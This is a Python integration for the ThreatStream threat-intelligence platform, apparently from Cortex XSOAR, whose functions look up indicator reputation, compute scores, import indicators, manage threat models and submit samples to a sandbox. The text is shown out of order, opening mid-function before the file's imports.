""" params = dict(limit=limit) model_type = model.title() response = client.http_request("GET", F"v1/{model}/{id}/intelligence/", params=params, resp_type='response') if response.status_code == 404: return f'No indicators found for Threat Model {model_type} with id {id}' iocs_list = response.json().get('objects', None) model_type = model.title() iocs_context = parse_indicators_list(iocs_list) outputs = { 'ModelType': model_type, 'ModelID': id, 'Indicators': iocs_context } readable_output = tableToMarkdown(f'Indicators list for Threat Model {model_type} with id {id}', iocs_context) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.Model', outputs_key_field=['ModelID', 'ModelType'], outputs=outputs, readable_output=readable_output, raw_response=iocs_list ) def create_model(client: Client, model, name, is_public="false", tlp=None, tags=None, intelligence=None, description=None): """ Creates Threat Model with basic parameters. """ data = build_model_data(model, name, is_public, tlp, tags, intelligence, description) model_id = client.http_request("POST", F"v1/{model}/", data=json.dumps(data)).get('id', None) if model_id: return get_iocs_by_model(client, model, model_id, limit="50") else: raise DemistoException(f'{model.title()} Threat Model was not created. Check the input parameters') def update_model(client: Client, model, model_id, name=None, is_public="false", tlp=None, tags=None, intelligence=None, description=None): """ Updates a ThreatStream model with parameters. In case one or more optional parameters are defined, the previous data is overridden. """ data = build_model_data(model, name, is_public, tlp, tags, intelligence, description) client.http_request("PATCH", F"v1/{model}/{model_id}/", data=json.dumps(data)) return get_iocs_by_model(client, model, model_id, limit="50") def get_supported_platforms(client: Client, sandbox_type="default"): """ Returns list of supported platforms for premium sandbox or default sandbox. """ platform_data = client.http_request("GET", "v1/submit/parameters/") result_key = 'platform_choices' if sandbox_type == 'default' else 'premium_platform_choices' available_platforms = platform_data.get(result_key, []) if not available_platforms: return f'No supported platforms found for {sandbox_type} sandbox' output = camelize(available_platforms) outputs_prefix = 'DefaultPlatforms' if sandbox_type == 'default' else 'PremiumPlatforms' return CommandResults( outputs_prefix=f'{THREAT_STREAM}.{outputs_prefix}', outputs=output, readable_output=tableToMarkdown(f'Supported platforms for {sandbox_type} sandbox', output), raw_response=platform_data ) def get_submission_status(client: Client, report_id, output_as_command_result=True): """ Returns the sandbox submission status. If status is not received in report_info then status is set to done. Receives boolean flag that indicates if result should be as command result. By default the output boolean is set to True. 
""" response = client.http_request("GET", F"v1/submit/{report_id}/", resp_type='response') if response.status_code == 404: return f'No report found with id {report_id}' report_info = response.json() status = report_info.get('status', "done") verdict = report_info.get('verdict', '').title() platform = report_info.get('platform', '') if output_as_command_result: report_outputs = {'ReportID': report_id, 'Status': status, 'Platform': platform, 'Verdict': verdict} readable_output = tableToMarkdown(f'The analysis status for id {report_id}', report_outputs) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.Analysis', outputs_key_field='ReportID', outputs=report_outputs, readable_output=readable_output, raw_response=report_info, ) else: return status, verdict def file_name_to_valid_string(file_name): """ Demoji the file name if it's contain emoji """ if emoji.emoji_count(file_name): # type: ignore return emoji.demojize(file_name) # type: ignore return file_name def submit_report(client: Client, submission_type, submission_value, submission_classification="private", report_platform="WINDOWS7", premium_sandbox="false", detail=None): """ Detonates URL or file that was uploaded to war room to ThreatStream sandbox. """ data = { 'report_radio-classification': submission_classification, 'report_radio-platform': report_platform, 'use_premium_sandbox': premium_sandbox, } if detail: data['detail'] = detail uploaded_file = None files = None if submission_type == 'file': # submission_value should be entry id of uploaded file in war room try: file_info = demisto.getFilePath(submission_value) except Exception: raise DemistoException(f'{THREAT_STREAM} - Entry {submission_value} does not contain a file.') uploaded_file = open(file_info['path'], 'rb') file_name = file_name_to_valid_string(file_info.get('name')) files = {'report_radio-file': (file_name, uploaded_file)} else: data['report_radio-url'] = submission_value submit_res = client.http_request("POST", "v1/submit/new/", data=data, files=files) # closing the opened file if exist if uploaded_file: uploaded_file.close() if argToBoolean(submit_res.get('success', 'false')): report_info = submit_res['reports'][report_platform] report_id = report_info['id'] report_status, _ = get_submission_status(client, report_id, False) report_outputs = {'ReportID': report_id, 'Status': report_status, 'Platform': report_platform} readable_output = tableToMarkdown(f'The submission info for {submission_value}', report_outputs) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.Analysis', outputs=report_outputs, readable_output=readable_output, raw_response=report_info, ) else: raise DemistoException(f'The submission of {submission_value} failed') def get_report(client: Client, report_id): """ Returns the report from ThreatStream sandbox by id. 
""" response = client.http_request('GET', f'v1/submit/{report_id}/report', resp_type='response') if response.status_code == 404: return f'No report found with id {report_id}' report = response.json() report_results = report.get('results', {}) if report_results: info = parse_info(report_results.get('info', {})) info['ReportID'] = report_id _, info['Verdict'] = get_submission_status(client, report_id, False) readable_output = tableToMarkdown(f'Report {report_id} analysis results', info) # ignore 'networks' from the readable output info['Network'] = parse_network_lists(report_results.get('network', {})) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.Analysis', outputs_key_field='ReportID', outputs=info, readable_output=readable_output, raw_response=report ) def add_tag_to_model(client: Client, model_id, tags, model="intelligence"): """ Adds tag to specific Threat Model. By default is set to intelligence (indicators). """ tags = argToList(tags) data = { 'tags': [{'name': t, 'tlp': 'red'} for t in tags] } res = client.http_request("POST", F"v1/{model}/{model_id}/tag/", data=json.dumps(data)) if argToBoolean(res.get('success', 'false')): return f'Added successfully tags: {tags} to {model} with {model_id}' else: raise DemistoException(f'Failed to add {tags} to {model} with {model_id}') def get_indicators(client: Client, **kwargs): """ Returns filtered indicators by parameters from ThreatStream. By default the limit of indicators result is set to 20. """ limit = kwargs['limit'] = int(kwargs.get('limit', 20)) offset = kwargs['offset'] = 0 url = "v2/intelligence/" if 'query' in kwargs: url += f"?{kwargs.pop("query")}" iocs_list = client.http_request("GET", url, params=kwargs).get('objects', None) if not iocs_list: return 'No indicators found from ThreatStream' iocs_context = parse_indicators_list(iocs_list) # handle the issue that the API does not return more than 1000 indicators. 
if limit > 1000: while len(iocs_context) < limit: offset += len(iocs_list) kwargs['limit'] = limit kwargs['offset'] = offset iocs_list = client.http_request("GET", "v2/intelligence/", params=kwargs).get('objects', None) if iocs_list: iocs_context.extend(parse_indicators_list(iocs_list)) else: break return CommandResults( outputs_prefix=f'{THREAT_STREAM}.Indicators', outputs=iocs_context, readable_output=tableToMarkdown("The indicators results", iocs_context), raw_response=iocs_list ) def main(): """ Initiate integration command """ command = demisto.command() LOG(f'Command being called is {command}') params = demisto.params() # init credentials user_name = params.get('credentials', {}).get('identifier') api_key = params.get('credentials', {}).get('password') server_url = params.get('url', '').strip('/') reliability = params.get('integrationReliability', DBotScoreReliability.B) if DBotScoreReliability.is_valid_type(reliability): reliability = DBotScoreReliability.get_dbot_score_reliability_from_str(reliability) else: Exception("Please provide a valid value for the Source Reliability parameter.") commands = { # reputation commands 'ip': ips_reputation_command, 'domain': domains_reputation_command, 'file': files_reputation_command, 'url': urls_reputation_command, 'threatstream-email-reputation': get_email_reputation, 'threatstream-import-indicator-with-approval': import_ioc_with_approval, 'threatstream-import-indicator-without-approval': import_ioc_without_approval, 'threatstream-get-analysis-status': get_submission_status, 'threatstream-get-passive-dns': get_passive_dns, 'threatstream-get-model-list': get_model_list, 'threatstream-get-model-description': get_model_description, 'threatstream-get-indicators-by-model': get_iocs_by_model, 'threatstream-get-indicators': get_indicators, 'threatstream-supported-platforms': get_supported_platforms, 'threatstream-analysis-report': get_report, 'threatstream-create-model': create_model, 'threatstream-update-model': update_model, 'threatstream-submit-to-sandbox': submit_report, 'threatstream-add-tag-to-model': add_tag_to_model, } try: client = Client( base_url=f'{server_url}/api/', user_name=user_name, api_key=api_key, verify=not params.get('insecure', False), proxy=params.get('proxy', False), reliability=reliability, should_create_relationships=params.get('create_relationships', True), ) args = prepare_args(demisto.args(), command, params) if command == 'test-module': result = test_module(client) elif command in REPUTATION_COMMANDS: result = commands[command](client, DBotScoreCalculator(params), **args) # type: ignore else: result = commands[command](client, **args) # type: ignore return_results(result) except Exception as err: return_error(f'{str(err)}, traceback {traceback.format_exc()}') # python2 uses __builtin__ python3 uses builtins if __name__ in ("builtins", "__builtin__", "__main__"): main()
import emoji import demistomock as demisto from CommonServerPython import * import traceback REPUTATION_COMMANDS = ['ip', 'domain', 'file', 'url', 'threatstream-email-reputation'] # Disable insecure warnings requests.packages.urllib3.disable_warnings() ''' GLOBALS/PARAMS ''' THREAT_STREAM = 'ThreatStream' NO_INDICATORS_FOUND_MSG = 'No intelligence has been found for {searchable_value}' DEFAULT_MALICIOUS_THRESHOLD = 65 DEFAULT_SUSPICIOUS_THRESHOLD = 25 HEADERS = { 'Content-Type': 'application/json' } IOC_ARGS_TO_INDICATOR_KEY_MAP = { 'domain': { 'domain': 'value', 'dns': 'ip', 'organization': 'org', 'traffic_light_protocol': 'tlp', 'geo_country': 'country', 'creation_date': 'created_ts', 'updated_date': 'modified_ts', 'registrant_name': 'meta.registrant_name', 'registrant_email': 'meta.registrant_email', 'registrant_phone': 'meta.registrant_phone' }, 'url': { 'url': 'value', 'asn': 'asn', 'organization': 'org', 'geo_country': 'country', 'traffic_light_protocol': 'tlp' }, 'ip': { 'ip': 'value', 'asn': 'asn', 'geo_latitude': 'latitude', 'geo_longitude': 'longitude', 'geo_country': 'country', 'traffic_light_protocol': 'tlp' }, 'file': { 'organization': 'org', 'traffic_light_protocol': 'tlp' } } DEFAULT_INDICATOR_MAPPING = { 'asn': 'ASN', 'value': 'Address', 'country': 'Country', 'type': 'Type', 'modified_ts': 'Modified', 'confidence': 'Confidence', 'status': 'Status', 'org': 'Organization', 'source': 'Source', 'tags': 'Tags', } FILE_INDICATOR_MAPPING = { 'modified_ts': 'Modified', 'confidence': 'Confidence', 'status': 'Status', 'source': 'Source', 'subtype': 'Type', 'tags': 'Tags' } INDICATOR_EXTENDED_MAPPING = { 'Value': 'value', 'ID': 'id', 'IType': 'itype', 'Confidence': 'confidence', 'Country': 'country', 'Organization': 'org', 'ASN': 'asn', 'Status': 'status', 'Tags': 'tags', 'Modified': 'modified_ts', 'Source': 'source', 'Type': 'type', 'Severity': 'severity' } RELATIONSHIPS_MAPPING = { 'ip': [ { 'name': EntityRelationship.Relationships.RESOLVES_TO, 'raw_field': 'rdns', 'entity_b_type': FeedIndicatorType.Domain }, { 'name': EntityRelationship.Relationships.INDICATOR_OF, 'raw_field': 'meta.maltype', 'entity_b_type': 'Malware' } ], 'domain': [ { 'name': EntityRelationship.Relationships.RESOLVED_FROM, 'raw_field': 'ip', 'entity_b_type': FeedIndicatorType.IP }, { 'name': EntityRelationship.Relationships.INDICATOR_OF, 'raw_field': 'meta.maltype', 'entity_b_type': 'Malware' } ], 'url': [ { 'name': EntityRelationship.Relationships.RESOLVED_FROM, 'raw_field': 'ip', 'entity_b_type': FeedIndicatorType.IP }, { 'name': EntityRelationship.Relationships.INDICATOR_OF, 'raw_field': 'meta.maltype', 'entity_b_type': 'Malware' } ], 'file': [ { 'name': EntityRelationship.Relationships.INDICATOR_OF, 'raw_field': 'meta.maltype', 'entity_b_type': 'Malware' } ], 'email': [ { 'name': EntityRelationship.Relationships.INDICATOR_OF, 'raw_field': 'meta.maltype', 'entity_b_type': 'Malware' } ] } ''' HELPER FUNCTIONS ''' class Client(BaseClient): def __init__(self, base_url, user_name, api_key, verify, proxy, reliability, should_create_relationships): super().__init__(base_url=base_url, verify=verify, proxy=proxy, ok_codes=(200, 201, 202)) self.reliability = reliability self.should_create_relationships = should_create_relationships self.credentials = { 'username': user_name, 'api_key': api_key } def http_request(self, method, url_suffix, params=None, data=None, headers=None, files=None, json=None, resp_type='json'): """ A wrapper for requests lib to send our requests and handle requests and responses better. 
""" params = params or {} params.update(self.credentials) res = super()._http_request( method=method, url_suffix=url_suffix, headers=headers, params=params, data=data, json_data=json, files=files, resp_type=resp_type, error_handler=self.error_handler, ) return res def error_handler(self, res: requests.Response): """ Error handler to call by super().http_request in case an error was occurred """ # Handle error responses gracefully if res.status_code == 401: raise DemistoException(f"{THREAT_STREAM} - Got unauthorized from the server. Check the credentials.") elif res.status_code in {404}: command = demisto.command() if command in ['threatstream-get-model-description', 'threatstream-get-indicators-by-model', 'threatstream-get-analysis-status', 'threatstream-analysis-report']: # in order to prevent raising en error in case model/indicator/report was not found return else: raise DemistoException(f"{THREAT_STREAM} - The resource was not found.") raise DemistoException(F"{THREAT_STREAM} - Error in API call {res.status_code} - {res.text}") class DBotScoreCalculator: """ Class for DBot score calculation based on thresholds and confidence """ def __init__(self, params: Dict): self.instance_defined_thresholds = { DBotScoreType.IP: arg_to_number(params.get('ip_threshold')), DBotScoreType.URL: arg_to_number(params.get('url_threshold')), DBotScoreType.FILE: arg_to_number(params.get('file_threshold')), DBotScoreType.DOMAIN: arg_to_number(params.get('domain_threshold')), DBotScoreType.EMAIL: arg_to_number(params.get('email_threshold')), } def calculate_score(self, ioc_type: str, indicator, threshold=None): """ Calculate the DBot score according the indicator's confidence and thresholds if exist """ # in case threshold was defined in the instance or passed as argument # we have only two scores levels - malicious or good # if threshold wasn't defined we have three score levels malicious suspicious and good confidence = indicator.get('confidence', Common.DBotScore.NONE) defined_threshold = threshold or self.instance_defined_thresholds.get(ioc_type) if defined_threshold: return Common.DBotScore.BAD if confidence >= defined_threshold else Common.DBotScore.GOOD else: if confidence > DEFAULT_MALICIOUS_THRESHOLD: return Common.DBotScore.BAD if confidence > DEFAULT_SUSPICIOUS_THRESHOLD: return Common.DBotScore.SUSPICIOUS else: return Common.DBotScore.GOOD def find_worst_indicator(indicators): """ Sorts list of indicators by confidence score and returns one indicator with the highest confidence. In case the indicator has no confidence value, the indicator score is set to 0 (NONE). 
""" indicators.sort(key=lambda ioc: ioc.get('confidence', Common.DBotScore.NONE), reverse=True) return indicators[0] def prepare_args(args, command, params): # removing empty keys that can be passed from playbook input args = {k: v for (k, v) in args.items() if v} # special handling for ip, domain, file, url and threatstream-email-reputation commands if command in REPUTATION_COMMANDS: default_include_inactive = params.get('include_inactive', False) include_inactive = argToBoolean(args.pop('include_inactive', default_include_inactive)) args['status'] = "active,inactive" if include_inactive else "active" if 'threshold' in args: args['threshold'] = arg_to_number(args['threshold']) # special handling for threatstream-get-indicators if 'indicator_severity' in args: args['meta.severity'] = args.pop('indicator_severity', None) if 'tags_name' in args: args['tags.name'] = args.pop('tags_name', None) if 'indicator_value' in args: args['value'] = args.pop('indicator_value', None) return args def get_tags(indicator): """ Return list of the indicator's tags threat_type and maltype """ tags = [] for key in ['meta.maltype', 'threat_type']: val = demisto.get(indicator, key) if val: tags.append(val) indicator_tags = indicator.get('tags', []) if indicator_tags: tags.extend([str(tag.get('name', '')) for tag in indicator_tags]) return tags def search_worst_indicator_by_params(client: Client, params): """ Generic function that searches for indicators from ThreatStream by given query string. Returns indicator with the highest confidence score. """ indicators_data = client.http_request("Get", "v2/intelligence/", params=params) if not indicators_data['objects']: return None return find_worst_indicator(indicators_data['objects']) def get_generic_threat_context(indicator, indicator_mapping=DEFAULT_INDICATOR_MAPPING): """ Receives indicator and builds new dictionary from values that were defined in DEFAULT_INDICATOR_MAPPING keys and adds the Severity key with indicator severity value. """ context = {indicator_mapping[k]: v for (k, v) in indicator.items() if k in indicator_mapping.keys()} context['Tags'] = get_tags(indicator) context['Severity'] = demisto.get(indicator, 'meta.severity') or 'low' return context def parse_network_elem(element_list, context_prefix): """ Parses the network elements list and returns a new dictionary. """ return list(map(lambda e: { F'{context_prefix}Source': e.get('src', ''), F'{context_prefix}Destination': e.get('dst', ''), F'{context_prefix}Port': e.get('dport', ''), }, element_list)) def parse_network_lists(network): """ Parses the network part that was received from sandbox report json. In each list, only sublist of 10 elements is taken. 
""" hosts = [{'Hosts': h} for h in network.get('hosts', [])[:10]] if 'packets' in network: network = network['packets'] udp_list = parse_network_elem(network.get('udp', [])[:10], 'Udp') icmp_list = parse_network_elem(network.get('icmp', [])[:10], 'Icmp') tcp_list = parse_network_elem(network.get('tcp', [])[:10], 'Tcp') http_list = parse_network_elem(network.get('http', [])[:10], 'Http') https_list = parse_network_elem(network.get('https', [])[:10], 'Https') network_result = udp_list + icmp_list + tcp_list + http_list + https_list + hosts return network_result def parse_info(info): """ Parses the info part that was received from sandbox report json """ info.update(info.pop('machine', {})) parsed_info = { 'Category': info.get('category', '').title(), 'Started': info.get('started', ''), 'Completed': info.get('ended', ''), 'Duration': info.get('duration', ''), 'VmName': info.get('name', ''), 'VmID': info.get('id', '') } return parsed_info def parse_indicators_list(iocs_list): """ Parses the indicator list and returns dictionary that will be set to context. """ iocs_context = [] for indicator in iocs_list: if indicator.get('type', '') == 'md5': indicator['type'] = indicator.get('subtype', '') indicator['severity'] = demisto.get(indicator, 'meta.severity') or 'low' tags = indicator.get('tags') or [] indicator['tags'] = ",".join(tag.get('name', '') for tag in tags) iocs_context.append({key: indicator.get(ioc_key) for (key, ioc_key) in INDICATOR_EXTENDED_MAPPING.items()}) return iocs_context def build_model_data(model, name, is_public, tlp, tags, intelligence, description): """ Builds data dictionary that is used in Threat Model creation/update request. """ if model == 'tipreport': description_field_name = 'body' else: description_field_name = 'description' data = {k: v for (k, v) in (('name', name), ('is_public', is_public), ('tlp', tlp), (description_field_name, description)) if v} if tags: data['tags'] = tags if isinstance(tags, list) else [t.strip() for t in tags.split(',')] if intelligence: data['intelligence'] = intelligence if isinstance(intelligence, list) else [i.strip() for i in intelligence.split(',')] return data def create_relationships(client: Client, indicator, ioc_type, relation_mapper): relationships: List[EntityRelationship] = [] if not client.should_create_relationships: return relationships for relation in relation_mapper: entity_b = demisto.get(indicator, relation['raw_field']) if entity_b: relationships.append(EntityRelationship(entity_a=indicator['value'], entity_a_type=ioc_type, name=relation['name'], entity_b=entity_b, entity_b_type=relation['entity_b_type'], source_reliability=client.reliability, brand=THREAT_STREAM)) return relationships ''' COMMANDS + REQUESTS FUNCTIONS ''' def test_module(client: Client): """ Performs basic get request to get item samples """ client.http_request('GET', 'v2/intelligence/', params=dict(limit=1)) return 'ok' def ips_reputation_command(client: Client, score_calc: DBotScoreCalculator, ip, status, threshold=None): results = [] # type: ignore ips = argToList(ip, ',') for single_ip in ips: results.append(get_ip_reputation(client, score_calc, single_ip, status, threshold)) return results def get_ip_reputation(client: Client, score_calc: DBotScoreCalculator, ip, status, threshold=None): """ Checks the reputation of given ip from ThreatStream and returns the indicator with highest confidence score. 
""" # get the indicator params = { 'value': ip, 'type': DBotScoreType.IP, 'status': status, 'limit': 0, } indicator = search_worst_indicator_by_params(client, params) if not indicator: return NO_INDICATORS_FOUND_MSG.format(searchable_value=ip) # Convert the tags objects into s string for the human readable. threat_context = get_generic_threat_context(indicator) tags_csv = ', '.join(threat_context.get('Tags', [])) human_readable = tableToMarkdown(f'IP reputation for: {ip}', threat_context | dict(Tags=tags_csv)) # build relationships relationships = create_relationships( client, indicator, FeedIndicatorType.IP, RELATIONSHIPS_MAPPING.get('ip'), ) # create the IP instance args_to_keys_map: Dict[str, str] = IOC_ARGS_TO_INDICATOR_KEY_MAP.get('ip') # type: ignore kwargs = {arg: demisto.get(indicator, key) for (arg, key) in args_to_keys_map.items()} dbot_score = Common.DBotScore( ip, DBotScoreType.IP, THREAT_STREAM, score=score_calc.calculate_score(DBotScoreType.IP, indicator, threshold), reliability=client.reliability, ) ip_indicator = Common.IP( dbot_score=dbot_score, tags=get_tags(indicator), threat_types=[Common.ThreatTypes(indicator.get('threat_type'))], relationships=relationships, **kwargs ) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.IP', outputs_key_field='Address', indicator=ip_indicator, readable_output=human_readable, outputs=threat_context, raw_response=indicator, relationships=relationships ) def domains_reputation_command(client: Client, score_calc: DBotScoreCalculator, domain, status, threshold=None): """ Wrapper function for get_domain_reputation. """ results = [] # type: ignore domains = argToList(domain, ',') for single_domain in domains: results.append(get_domain_reputation(client, score_calc, single_domain, status, threshold)) return results def get_domain_reputation(client: Client, score_calc: DBotScoreCalculator, domain, status, threshold=None): """ Checks the reputation of given domain from ThreatStream and returns the indicator with highest confidence score. """ # get the indicator params = dict(value=domain, type=DBotScoreType.DOMAIN, status=status, limit=0) indicator = search_worst_indicator_by_params(client, params) if not indicator: return NO_INDICATORS_FOUND_MSG.format(searchable_value=domain) # Convert the tags objects into s string for the human readable. 
threat_context = get_generic_threat_context(indicator) tags_csv = ', '.join(threat_context.get('Tags', [])) human_readable = tableToMarkdown(f'Domain reputation for: {domain}', threat_context | dict(Tags=tags_csv)) # build relationships relationships = create_relationships( client, indicator, FeedIndicatorType.Domain, RELATIONSHIPS_MAPPING.get('domain'), ) # create the Domain instance args_to_keys_map: Dict[str, str] = IOC_ARGS_TO_INDICATOR_KEY_MAP.get('domain') # type: ignore kwargs = {arg: demisto.get(indicator, key) for (arg, key) in args_to_keys_map.items()} geo_location = f"{indicator.get('latitude')},{indicator.get('longitude')}" if indicator.get('latitude') else None dbot_score = Common.DBotScore( domain, DBotScoreType.DOMAIN, THREAT_STREAM, reliability=client.reliability, score=score_calc.calculate_score(DBotScoreType.DOMAIN, indicator, threshold), ) domain_indicator = Common.Domain( dbot_score=dbot_score, tags=get_tags(indicator), threat_types=[Common.ThreatTypes(indicator.get('threat_type'))], geo_location=geo_location, relationships=relationships, **kwargs, ) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.Domain', outputs_key_field='Address', indicator=domain_indicator, readable_output=human_readable, outputs=threat_context, raw_response=indicator, relationships=relationships ) def files_reputation_command(client: Client, score_calc: DBotScoreCalculator, file, status, threshold=None): """ Wrapper function for get_file_reputation. """ results = [] files = argToList(file, ',') for single_file in files: results.append(get_file_reputation(client, score_calc, single_file, status, threshold)) return results def get_file_reputation(client: Client, score_calc: DBotScoreCalculator, file, status, threshold=None): """ Checks the reputation of given hash of the file from ThreatStream and returns the indicator with highest severity score. """ # get the indicator params = dict(value=file, type="md5", status=status, limit=0) indicator = search_worst_indicator_by_params(client, params) if not indicator: return NO_INDICATORS_FOUND_MSG.format(searchable_value=file) # save the hash value under the hash type key threat_context = get_generic_threat_context(indicator, indicator_mapping=FILE_INDICATOR_MAPPING) file_type: str = indicator.get('subtype') # The real type of the hash is in subtype field. if file_type: threat_context[file_type] = indicator.get('value') # Convert the tags objects into s string for the human readable. 
tags_csv = ', '.join(threat_context.get('Tags', [])) human_readable = tableToMarkdown(f'File reputation for: {file}', threat_context | dict(Tags=tags_csv)) # build relationships relationships = create_relationships( client, indicator, FeedIndicatorType.File, RELATIONSHIPS_MAPPING.get('file'), ) # create the File instance args_to_keys_map: Dict[str, str] = IOC_ARGS_TO_INDICATOR_KEY_MAP.get('file') # type: ignore kwargs = {arg: demisto.get(indicator, key) for (arg, key) in args_to_keys_map.items()} if file_type: kwargs[file_type.lower()] = threat_context[file_type] dbot_score = Common.DBotScore( file, DBotScoreType.FILE, THREAT_STREAM, reliability=client.reliability, score=score_calc.calculate_score(DBotScoreType.FILE, indicator, threshold), ) file_indicator = Common.File( dbot_score=dbot_score, tags=get_tags(indicator), threat_types=[Common.ThreatTypes(indicator.get('threat_type'))], relationships=relationships, **kwargs, ) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.{Common.File.CONTEXT_PATH}', indicator=file_indicator, readable_output=human_readable, outputs=threat_context, raw_response=indicator, relationships=relationships ) def urls_reputation_command(client: Client, score_calc: DBotScoreCalculator, url, status, threshold=None): """ Wrapper function for get_url_reputation. """ results = [] urls = argToList(url, ',') for single_url in urls: results.append(get_url_reputation(client, score_calc, single_url, status, threshold)) return results def get_url_reputation(client: Client, score_calc: DBotScoreCalculator, url, status, threshold=None): """ Checks the reputation of given url address from ThreatStream and returns the indicator with highest confidence score. """ # get the indicator params = dict(value=url, type=DBotScoreType.URL, status=status, limit=0) indicator = search_worst_indicator_by_params(client, params) if not indicator: return NO_INDICATORS_FOUND_MSG.format(searchable_value=url) # Convert the tags objects into s string for the human readable. threat_context = get_generic_threat_context(indicator) tags_csv = ', '.join(threat_context.get('Tags', [])) human_readable = tableToMarkdown(f'URL reputation for: {url}', threat_context | dict(Tags=tags_csv)) # build relationships relationships = create_relationships( client, indicator, FeedIndicatorType.URL, RELATIONSHIPS_MAPPING.get('url'), ) # create the URL instance args_to_keys_map: Dict[str, str] = IOC_ARGS_TO_INDICATOR_KEY_MAP.get('url') # type: ignore kwargs = {arg: demisto.get(indicator, key_in_indicator) for (arg, key_in_indicator) in args_to_keys_map.items()} dbot_score = Common.DBotScore( url, DBotScoreType.URL, THREAT_STREAM, reliability=client.reliability, score=score_calc.calculate_score(DBotScoreType.URL, indicator, threshold), ) url_indicator = Common.URL( dbot_score=dbot_score, tags=get_tags(indicator), threat_types=[Common.ThreatTypes(indicator.get('threat_type'))], relationships=relationships, **kwargs, ) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.URL', outputs_key_field='Address', indicator=url_indicator, readable_output=human_readable, outputs=threat_context, raw_response=indicator, relationships=relationships ) def get_email_reputation(client: Client, score_calc: DBotScoreCalculator, email, status, threshold=None): """ Checks the reputation of given email address from ThreatStream and returns the indicator with highest confidence score. 
""" params = dict(value=email, type=DBotScoreType.EMAIL, status=status, limit=0) indicator = search_worst_indicator_by_params(client, params) if not indicator: return NO_INDICATORS_FOUND_MSG.format(searchable_value=email) threat_context = get_generic_threat_context(indicator) threat_context['Email'] = threat_context.pop('Address') threat_context.pop('ASN', None) threat_context.pop('Organization', None) threat_context.pop('Country', None) # Convert the tags objects into s string for the human readable. tags_csv = ', '.join(threat_context.get('Tags', [])) human_readable = tableToMarkdown(f'Email reputation for: {email}', threat_context | dict(Tags=tags_csv)) # build relationships relationships = create_relationships( client, indicator, FeedIndicatorType.Email, RELATIONSHIPS_MAPPING.get('email'), ) dbot_score = Common.DBotScore( email, DBotScoreType.EMAIL, THREAT_STREAM, reliability=client.reliability, score=score_calc.calculate_score(DBotScoreType.EMAIL, indicator, threshold), ) # create the EMAIL instance email_indicator = Common.EMAIL( dbot_score=dbot_score, address=threat_context['Email'], relationships=relationships, ) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.EmailReputation', outputs_key_field='Email', indicator=email_indicator, readable_output=human_readable, outputs=threat_context, raw_response=indicator, relationships=relationships ) def get_passive_dns(client: Client, value, type=DBotScoreType.IP, limit=50): """ Receives value and type of indicator and returns enrichment data for domain or ip. """ dns_results = client.http_request("GET", F"v1/pdns/{type}/{value}/").get('results', None) if not dns_results: return f'No Passive DNS enrichment data found for {value}' dns_results = dns_results[:int(limit)] output = camelize(dns_results, delim='_') human_readable = tableToMarkdown(f'Passive DNS enrichment data for: {value}', output) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.PassiveDNS', readable_output=human_readable, outputs=output, raw_response=dns_results, ) def import_ioc_with_approval(client: Client, import_type, import_value, confidence="50", classification="Private", threat_type="exploit", severity="low", ip_mapping=None, domain_mapping=None, url_mapping=None, email_mapping=None, md5_mapping=None): """ Imports indicators data to ThreatStream. The data can be imported using one of three import_types: data-text (plain-text), file-id of uploaded file to war room or URL. """ # prepare data = assign_params( classification=classification, confidence=int(confidence), ip_mapping=ip_mapping, domain_mapping=domain_mapping, url_mapping=url_mapping, email_mapping=email_mapping, md5_mapping=md5_mapping, threat_type=threat_type, severity=severity, ) files = None uploaded_file = None if import_type == 'file-id': try: # import_value should be entry id of uploaded file in war room file_info = demisto.getFilePath(import_value) except Exception: raise DemistoException(f'{THREAT_STREAM} - Entry {import_value} does not contain a file.') uploaded_file = open(file_info['path'], 'rb') files = {'file': (file_info['name'], uploaded_file)} else: data[import_type] = import_value # request res = client.http_request("POST", "v1/intelligence/import/", data=data, files=files) # closing the opened file if exist if uploaded_file: uploaded_file.close() # checking that response contains success key if res.get('success', False): imported_id = res.get('import_session_id', '') readable_output = f'The data was imported successfully. 
The ID of imported job is: {imported_id}' return CommandResults( outputs_prefix=f'{THREAT_STREAM}.Import.ImportID', outputs_key_field='ImportID', outputs=imported_id, readable_output=readable_output, raw_response=res, ) else: raise DemistoException('The data was not imported. Check if valid arguments were passed') def import_ioc_without_approval(client: Client, file_id, classification, confidence=None, allow_unresolved='no', source_confidence_weight=None, expiration_ts=None, severity=None, tags=None, trustedcircles=None): """ Imports indicators data to ThreatStream. file_id of uploaded file to war room. """ if tags: tags = argToList(tags) if trustedcircles: trustedcircles = argToList(trustedcircles) try: # entry id of uploaded file to war room file_info = demisto.getFilePath(file_id) with open(file_info['path'], 'rb') as uploaded_file: ioc_to_import = json.load(uploaded_file) except json.JSONDecodeError: raise DemistoException(f'{THREAT_STREAM} - Entry {file_id} does not contain a valid json file.') except Exception: raise DemistoException(f'{THREAT_STREAM} - Entry {file_id} does not contain a file.') ioc_to_import.update({'meta': assign_params( classification=classification, confidence=confidence, allow_unresolved=argToBoolean(allow_unresolved), source_confidence_weight=source_confidence_weight, expiration_ts=expiration_ts, severity=severity, tags=tags, trustedcircles=trustedcircles )}) client.http_request("PATCH", "v1/intelligence/", json=ioc_to_import, resp_type='text') return "The data was imported successfully." def get_model_list(client: Client, model, limit="50"): """ Returns list of Threat Model that was specified. By default limit is set to 50 results. Possible values for model are : actor, campaign, incident, signature, ttp, vulnerability, tipreport """ # if limit=0 don't put to context params = dict(limit=limit, skip_intelligence="true", skip_associations="true") model_list = client.http_request("GET", F"v1/{model}/", params=params).get('objects', None) if not model_list: return f'No Threat Model {model.title()} found.' model_type = model.title() models_context = [ { 'Name': threat_model.get('name'), 'ID': threat_model.get('id'), 'CreatedTime': threat_model.get('created_ts'), 'Type': model_type } for threat_model in model_list ] # in case that no limit was passed, the stage of set to context is skipped readable_output = tableToMarkdown(f"List of {model.title()}s", models_context) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.List', outputs_key_field='ID', outputs=models_context if limit != '0' else None, readable_output=readable_output, raw_response=model_list ) def get_model_description(client: Client, model, id): """ Returns a description of Threat Model as html file to the war room. """ params = dict(skip_intelligence="true", skip_associations="true") response = client.http_request("GET", F"v1/{model}/{id}", params=params, resp_type='response') if response.status_code == 404: return f'No description found for Threat Model {model.title()} 